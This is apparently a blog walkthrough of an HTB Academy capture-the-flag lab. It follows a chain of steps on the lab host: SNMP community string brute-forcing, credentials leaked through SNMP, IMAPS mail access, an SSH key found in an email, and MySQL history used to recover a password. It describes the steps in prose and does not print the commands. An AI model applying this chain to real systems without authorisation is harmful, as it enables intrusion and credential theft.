HTB Academy: "Footprinting Lab - Hard" Walkthrough
- Winifred
- Aug 18, 2024
- 2 min read
Enumeration
Let's run a UDP and TCP nmap scan against the target host:
Here we see that SNMP is open, as well as SSH, POP3, and IMAP.
SNMP
Let's use onesixtyone to brute-force community strings for the SNMP service:
onesixtyone returns "backup" as the community string. Let's now use that to get the MIB and see if there are any useful strings in it.
A couple of lines down we find some credentials:
We can now use these credentials to pivot into the mail services available on the system.
IMAPS
First we use openssl to establish a connection to the IMAPS service:
Then we login using Tom's credentials:
From here, let's list the available mailboxes:
Let's take a look in the Inbox:
There's one message in the inbox. Let's fetch the message body and see what the contents is:
There's an SSH key in the body of the message. We can probably use this to access the system over SSH. Copy the body of the message into a local file on your host. Make sure to chmod 600 the file so that it has restrictive enough permissions and SSH doesn't give you a hard time.
SSH
Let's use the ssh key to try and access the system:
From here, start enumerating as thoroughly as possible. The goal of the exercise is to find the password for the HTB user.
If we run an ls -la in tom's home folder, we can see that there is a hidden .mysql_history file here.
Catting it shows us a set of mysql queries:
Let's check if mysql is running on the system:
Connect to the mysql instance using tom's user and the password you found in the SNMP data:
Repeat the commands you found in the .mysql_history file:
The HTB user's password will be found in that output. Happy hacking!